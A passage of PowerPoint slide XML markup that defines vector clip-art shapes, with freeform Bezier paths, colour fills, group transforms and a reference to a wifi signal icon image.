                      <a:pt x="196" y="163"/>
                      <a:pt x="197" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="125"/>
                      <a:pt x="196" y="60"/>
                      <a:pt x="196" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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6" name="Freeform 1796">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B574C9B1-5C5E-4E84-AFF2-3241E0379B9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63" y="1229"/>
                <a:ext cx="343" cy="269"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 254"/>
                  <a:gd name="T1" fmla="*/ 119 h 200"/>
                  <a:gd name="T2" fmla="*/ 184 w 254"/>
                  <a:gd name="T3" fmla="*/ 127 h 200"/>
                  <a:gd name="T4" fmla="*/ 173 w 254"/>
                  <a:gd name="T5" fmla="*/ 55 h 200"/>
                  <a:gd name="T6" fmla="*/ 144 w 254"/>
                  <a:gd name="T7" fmla="*/ 27 h 200"/>
                  <a:gd name="T8" fmla="*/ 96 w 254"/>
                  <a:gd name="T9" fmla="*/ 14 h 200"/>
                  <a:gd name="T10" fmla="*/ 51 w 254"/>
                  <a:gd name="T11" fmla="*/ 2 h 200"/>
                  <a:gd name="T12" fmla="*/ 18 w 254"/>
                  <a:gd name="T13" fmla="*/ 13 h 200"/>
                  <a:gd name="T14" fmla="*/ 3 w 254"/>
                  <a:gd name="T15" fmla="*/ 96 h 200"/>
                  <a:gd name="T16" fmla="*/ 3 w 254"/>
                  <a:gd name="T17" fmla="*/ 96 h 200"/>
                  <a:gd name="T18" fmla="*/ 2 w 254"/>
                  <a:gd name="T19" fmla="*/ 99 h 200"/>
                  <a:gd name="T20" fmla="*/ 2 w 254"/>
                  <a:gd name="T21" fmla="*/ 99 h 200"/>
                  <a:gd name="T22" fmla="*/ 9 w 254"/>
                  <a:gd name="T23" fmla="*/ 118 h 200"/>
                  <a:gd name="T24" fmla="*/ 26 w 254"/>
                  <a:gd name="T25" fmla="*/ 119 h 200"/>
                  <a:gd name="T26" fmla="*/ 33 w 254"/>
                  <a:gd name="T27" fmla="*/ 117 h 200"/>
                  <a:gd name="T28" fmla="*/ 33 w 254"/>
                  <a:gd name="T29" fmla="*/ 117 h 200"/>
                  <a:gd name="T30" fmla="*/ 36 w 254"/>
                  <a:gd name="T31" fmla="*/ 116 h 200"/>
                  <a:gd name="T32" fmla="*/ 43 w 254"/>
                  <a:gd name="T33" fmla="*/ 114 h 200"/>
                  <a:gd name="T34" fmla="*/ 44 w 254"/>
                  <a:gd name="T35" fmla="*/ 76 h 200"/>
                  <a:gd name="T36" fmla="*/ 41 w 254"/>
                  <a:gd name="T37" fmla="*/ 77 h 200"/>
                  <a:gd name="T38" fmla="*/ 44 w 254"/>
                  <a:gd name="T39" fmla="*/ 53 h 200"/>
                  <a:gd name="T40" fmla="*/ 43 w 254"/>
                  <a:gd name="T41" fmla="*/ 171 h 200"/>
                  <a:gd name="T42" fmla="*/ 53 w 254"/>
                  <a:gd name="T43" fmla="*/ 183 h 200"/>
                  <a:gd name="T44" fmla="*/ 111 w 254"/>
                  <a:gd name="T45" fmla="*/ 199 h 200"/>
                  <a:gd name="T46" fmla="*/ 140 w 254"/>
                  <a:gd name="T47" fmla="*/ 177 h 200"/>
                  <a:gd name="T48" fmla="*/ 140 w 254"/>
                  <a:gd name="T49" fmla="*/ 171 h 200"/>
                  <a:gd name="T50" fmla="*/ 140 w 254"/>
                  <a:gd name="T51" fmla="*/ 139 h 200"/>
                  <a:gd name="T52" fmla="*/ 139 w 254"/>
                  <a:gd name="T53" fmla="*/ 98 h 200"/>
                  <a:gd name="T54" fmla="*/ 137 w 254"/>
                  <a:gd name="T55" fmla="*/ 84 h 200"/>
                  <a:gd name="T56" fmla="*/ 136 w 254"/>
                  <a:gd name="T57" fmla="*/ 79 h 200"/>
                  <a:gd name="T58" fmla="*/ 137 w 254"/>
                  <a:gd name="T59" fmla="*/ 84 h 200"/>
                  <a:gd name="T60" fmla="*/ 139 w 254"/>
                  <a:gd name="T61" fmla="*/ 98 h 200"/>
                  <a:gd name="T62" fmla="*/ 145 w 254"/>
                  <a:gd name="T63" fmla="*/ 136 h 200"/>
                  <a:gd name="T64" fmla="*/ 145 w 254"/>
                  <a:gd name="T65" fmla="*/ 137 h 200"/>
                  <a:gd name="T66" fmla="*/ 145 w 254"/>
                  <a:gd name="T67" fmla="*/ 137 h 200"/>
                  <a:gd name="T68" fmla="*/ 145 w 254"/>
                  <a:gd name="T69" fmla="*/ 142 h 200"/>
                  <a:gd name="T70" fmla="*/ 155 w 254"/>
                  <a:gd name="T71" fmla="*/ 165 h 200"/>
                  <a:gd name="T72" fmla="*/ 170 w 254"/>
                  <a:gd name="T73" fmla="*/ 171 h 200"/>
                  <a:gd name="T74" fmla="*/ 223 w 254"/>
                  <a:gd name="T75" fmla="*/ 155 h 200"/>
                  <a:gd name="T76" fmla="*/ 209 w 254"/>
                  <a:gd name="T77" fmla="*/ 119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4" h="200">
                    <a:moveTo>
                      <a:pt x="209" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="121"/>
                      <a:pt x="197" y="123"/>
                      <a:pt x="184" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="94"/>
                      <a:pt x="175" y="64"/>
                      <a:pt x="173" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="36"/>
                      <a:pt x="153" y="30"/>
                      <a:pt x="144" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="23"/>
                      <a:pt x="110" y="18"/>
                      <a:pt x="96" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="10"/>
                      <a:pt x="61" y="4"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="18" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="16"/>
                      <a:pt x="10" y="56"/>
                      <a:pt x="3" y="96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0" y="109"/>
                      <a:pt x="4" y="116"/>
                      <a:pt x="9" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="121"/>
                      <a:pt x="20" y="120"/>
                      <a:pt x="26" y="119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34" y="117"/>
                      <a:pt x="35" y="117"/>
                      <a:pt x="36" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="116"/>
                      <a:pt x="41" y="115"/>
                      <a:pt x="43" y="114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3" y="76"/>
                      <a:pt x="42" y="77"/>
                      <a:pt x="41" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="60"/>
                      <a:pt x="44" y="49"/>
                      <a:pt x="44" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="59"/>
                      <a:pt x="43" y="123"/>
                      <a:pt x="43" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="177"/>
                      <a:pt x="47" y="182"/>
                      <a:pt x="53" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="102" y="197"/>
                      <a:pt x="111" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="200"/>
                      <a:pt x="138" y="190"/>
                      <a:pt x="140" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="175"/>
                      <a:pt x="140" y="173"/>
                      <a:pt x="140" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="124"/>
                      <a:pt x="140" y="111"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="92"/>
                      <a:pt x="137" y="87"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="82"/>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="82"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="88"/>
                      <a:pt x="138" y="93"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="108"/>
                      <a:pt x="142" y="120"/>
                      <a:pt x="145" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="136"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="154"/>
                      <a:pt x="151" y="161"/>
                      <a:pt x="155" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="169"/>
                      <a:pt x="164" y="170"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="167"/>
                      <a:pt x="204" y="161"/>
                      <a:pt x="223" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254" y="147"/>
                      <a:pt x="236" y="110"/>
                      <a:pt x="209" y="119"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FF66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7" name="Freeform 1797">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB6FB3E-5E54-4101-90F2-0A055D26A5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40" y="1214"/>
                <a:ext cx="89" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 16 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 54 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 30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30" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="21"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="16" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="54" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="21"/>
                      <a:pt x="47" y="25"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="30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8" name="Oval 1798">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D58310B9-9670-4D4E-9B49-914AE25CCA89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 flipH="1">
                <a:off x="2429" y="1132"/>
                <a:ext cx="119" cy="119"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC99"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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pic>
          <p:nvPicPr>
            <p:cNvPr id="1613" name="Picture 6" descr="Y:\Web2.0 PNG Icons\wifi\signal6.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{566C3CC7-D00B-479D-93FC-F55D93A1F8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82104" y="2462866"/>
              <a:ext cx="318539" cy="32510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614" name="Group 1613">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8080625-B0C9-4FDD-9F88-A7CB4B41B15B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7855738" y="2942265"/>
              <a:ext cx="2063750" cy="555625"/>
              <a:chOff x="4887296" y="3059133"/>
              <a:chExt cx="2063750" cy="555625"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1959" name="Freeform 1308">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B67959A2-900B-4AF6-8E13-E9B166BF265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87296" y="3059133"/>
                <a:ext cx="2063750" cy="555625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ACACA"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd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60" name="Freeform 1310">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B6F5B0-7845-43F5-B278-2742F93C9F6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07958" y="3102493"/>
                <a:ext cx="1631950" cy="439738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noFill/>
              <a:ln w="38100" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="99CC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ACACA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961" name="Group 1218">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C256D2DC-4C15-445A-A7E9-818F3F09D3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5352434" y="3073918"/>
                <a:ext cx="355600" cy="187325"/>
                <a:chOff x="2880" y="1638"/>
                <a:chExt cx="224" cy="118"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1991" name="Freeform 1219">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1561B8FC-7FEE-48AB-9354-D39DDCCA3D5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0" y="1638"/>
                  <a:ext cx="224" cy="60"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1810"/>
                    <a:gd name="T1" fmla="*/ 120 h 486"/>
                    <a:gd name="T2" fmla="*/ 451 w 1810"/>
                    <a:gd name="T3" fmla="*/ 0 h 486"/>
                    <a:gd name="T4" fmla="*/ 1810 w 1810"/>
                    <a:gd name="T5" fmla="*/ 363 h 486"/>
                    <a:gd name="T6" fmla="*/ 1358 w 1810"/>
                    <a:gd name="T7" fmla="*/ 486 h 486"/>
                    <a:gd name="T8" fmla="*/ 0 w 1810"/>
                    <a:gd name="T9" fmla="*/ 120 h 4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10" h="486">
                      <a:moveTo>
                        <a:pt x="0" y="120"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="451" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1810" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1358" y="486"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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92" name="Freeform 1220">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6166B5AC-E1E6-489B-AEF8-A971D5917AD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0" y="1653"/>
                  <a:ext cx="168" cy="103"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1358"/>
                    <a:gd name="T1" fmla="*/ 0 h 834"/>
                    <a:gd name="T2" fmla="*/ 0 w 1358"/>
                    <a:gd name="T3" fmla="*/ 470 h 834"/>
                    <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                    <a:gd name="T5" fmla="*/ 834 h 834"/>
                    <a:gd name="T6" fmla="*/ 1358 w 1358"/>
                    <a:gd name="T7" fmla="*/ 366 h 834"/>
                    <a:gd name="T8" fmla="*/ 0 w 1358"/>
                    <a:gd name="T9" fmla="*/ 0 h 8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8" h="834">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1358" y="834"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1358" y="36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93" name="Freeform 1221">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F854F464-D216-452E-BB91-DF2228FB613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48" y="1683"/>
                  <a:ext cx="56" cy="73"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 452"/>
                    <a:gd name="T1" fmla="*/ 591 h 591"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 123 h 591"/>
                    <a:gd name="T4" fmla="*/ 452 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 591"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 470 h 591"/>
                    <a:gd name="T8" fmla="*/ 0 w 452"/>
                    <a:gd name="T9" fmla="*/ 591 h 5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2" h="591">
                      <a:moveTo>
                        <a:pt x="0" y="591"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="59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62" name="Group 1056">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21C7CBA-2EED-44C7-939F-28885807B750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5828915" y="3090511"/>
                <a:ext cx="528192" cy="398462"/>
                <a:chOff x="1072" y="2451"/>
                <a:chExt cx="672" cy="506"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="1963" name="Group 1057">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66EFEDC3-B0CF-4882-AE1B-F4C5943FA3A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flipH="1">
                  <a:off x="1072" y="2559"/>
                  <a:ext cx="652" cy="398"/>
                  <a:chOff x="1977" y="2705"/>
                  <a:chExt cx="897" cy="548"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1979" name="Freeform 1058">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4C6D6A-F7F9-4140-9258-7C6C67B244B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1977" y="2787"/>
                    <a:ext cx="45" cy="321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3 h 87"/>
                      <a:gd name="T4" fmla="*/ 0 w 12"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 12 w 12"/>
                      <a:gd name="T7" fmla="*/ 3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3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0" name="Freeform 1059">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4383F65C-9E7D-4EB4-AA03-579426785D4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022" y="2787"/>
                    <a:ext cx="46" cy="321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3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3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1" name="Freeform 1060">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3886D5A7-2703-46A1-9677-A2298A5AA26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574" y="2932"/>
                    <a:ext cx="45" cy="321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2" name="Freeform 1061">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FA49B89-CA49-4C5A-9DFC-CADCFF842F9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529" y="2932"/>
                    <a:ext cx="45" cy="321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3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3" name="Freeform 1062">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E08742D2-C8FE-4695-AE2B-9775E5BED94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829" y="2866"/>
                    <a:ext cx="45" cy="321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4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4" name="Freeform 1063">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E918EE98-7E01-45D5-A051-C0C387FB7EF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780" y="2866"/>
                    <a:ext cx="49" cy="321"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 13 w 13"/>
                      <a:gd name="T1" fmla="*/ 87 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 13"/>
                      <a:gd name="T3" fmla="*/ 84 h 87"/>
                      <a:gd name="T4" fmla="*/ 0 w 13"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 13 w 13"/>
                      <a:gd name="T7" fmla="*/ 4 h 87"/>
                      <a:gd name="T8" fmla="*/ 13 w 13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87">
                        <a:moveTo>
                          <a:pt x="13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3" y="4"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="13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5" name="Freeform 1064">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0B62D74-A22E-42D0-83B8-827ECBF60BB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277" y="2705"/>
                    <a:ext cx="45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3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6" name="Freeform 1065">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F068EE89-62D5-44D0-9B58-EF559DF2823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277" y="2717"/>
                    <a:ext cx="45" cy="322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4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7" name="Freeform 1066">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FBB81B-98CE-4C40-8AAF-81546855083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235" y="2717"/>
                    <a:ext cx="42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4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4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8" name="Freeform 1067">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A09F18FD-D60A-4A14-909C-DABBDF61B78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1977" y="2787"/>
                    <a:ext cx="597" cy="206"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 161 w 161"/>
                      <a:gd name="T1" fmla="*/ 43 h 56"/>
                      <a:gd name="T2" fmla="*/ 161 w 161"/>
                      <a:gd name="T3" fmla="*/ 56 h 56"/>
                      <a:gd name="T4" fmla="*/ 0 w 161"/>
                      <a:gd name="T5" fmla="*/ 12 h 56"/>
                      <a:gd name="T6" fmla="*/ 0 w 161"/>
                      <a:gd name="T7" fmla="*/ 0 h 56"/>
                      <a:gd name="T8" fmla="*/ 161 w 161"/>
                      <a:gd name="T9" fmla="*/ 43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1" h="56">
                        <a:moveTo>
                          <a:pt x="161" y="43"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="161" y="56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61" y="43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9" name="Freeform 1068">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4104BE79-15B4-4640-BC09-B848D823ADD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574" y="2866"/>
                    <a:ext cx="300" cy="127"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 81 w 81"/>
                      <a:gd name="T1" fmla="*/ 0 h 35"/>
                      <a:gd name="T2" fmla="*/ 81 w 81"/>
                      <a:gd name="T3" fmla="*/ 13 h 35"/>
                      <a:gd name="T4" fmla="*/ 0 w 81"/>
                      <a:gd name="T5" fmla="*/ 35 h 35"/>
                      <a:gd name="T6" fmla="*/ 0 w 81"/>
                      <a:gd name="T7" fmla="*/ 22 h 35"/>
                      <a:gd name="T8" fmla="*/ 81 w 8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1" h="35">
                        <a:moveTo>
                          <a:pt x="81" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="81" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="0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90" name="Freeform 1069">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B632A244-A9C1-4991-9F7D-A95E224CEEB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1977" y="2705"/>
                    <a:ext cx="897" cy="240"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 242 w 242"/>
                      <a:gd name="T1" fmla="*/ 43 h 65"/>
                      <a:gd name="T2" fmla="*/ 161 w 242"/>
                      <a:gd name="T3" fmla="*/ 22 h 65"/>
                      <a:gd name="T4" fmla="*/ 161 w 242"/>
                      <a:gd name="T5" fmla="*/ 22 h 65"/>
                      <a:gd name="T6" fmla="*/ 81 w 242"/>
                      <a:gd name="T7" fmla="*/ 0 h 65"/>
                      <a:gd name="T8" fmla="*/ 0 w 242"/>
                      <a:gd name="T9" fmla="*/ 22 h 65"/>
                      <a:gd name="T10" fmla="*/ 81 w 242"/>
                      <a:gd name="T11" fmla="*/ 44 h 65"/>
                      <a:gd name="T12" fmla="*/ 81 w 242"/>
                      <a:gd name="T13" fmla="*/ 44 h 65"/>
                      <a:gd name="T14" fmla="*/ 161 w 242"/>
                      <a:gd name="T15" fmla="*/ 65 h 65"/>
                      <a:gd name="T16" fmla="*/ 242 w 242"/>
                      <a:gd name="T17" fmla="*/ 43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42" h="65">
                        <a:moveTo>
                          <a:pt x="242" y="43"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="161" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="161" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="161" y="65"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="242" y="43"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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64" name="Group 1070">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
